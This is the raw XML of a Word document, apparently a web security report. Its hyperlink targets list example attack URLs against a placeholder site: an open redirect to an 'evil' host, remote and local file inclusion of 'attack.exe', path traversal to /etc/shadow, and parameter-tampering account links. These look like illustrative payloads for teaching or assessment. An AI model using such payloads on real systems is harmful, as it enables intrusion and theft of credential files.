  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005744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44CD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005744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44CD"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CD6665"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CD66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com.php?redirect=http%3a//www.evilhacker.com" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mc.com/app.php?include=http://evil.attacker.com/attack.ex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c.com.php?redirect=http%3a//www.terraria.com" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mc.com/app.php?include=C:\\www\\uploads\\attack.ex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c.com.account/../../../etc/shadow" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mc.com/account=12345&amp;account=12345" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mc.com/account.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mc.com/getDocument.php?docID=1842" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mc.com/account=123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51a4685-9fa8-4bee-ab14-8828cb079b39}" enabled="0" method="" siteId="{851a4685-9fa8-4bee-ab14-8828cb079b39}" removed="1"/>
</clbl:labelList>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal</Template>
  <TotalTime>1624</TotalTime>
  <Pages>21</Pages>
  <Words>6285</Words>
  <Characters>35827</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>298</Lines>
  <Paragraphs>84</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>42028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KAYDEN HUNG (LAX)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>KAYDEN HUNG (LAX)</cp:lastModifiedBy>
  <cp:revision>472</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-08T22:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-16T21:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>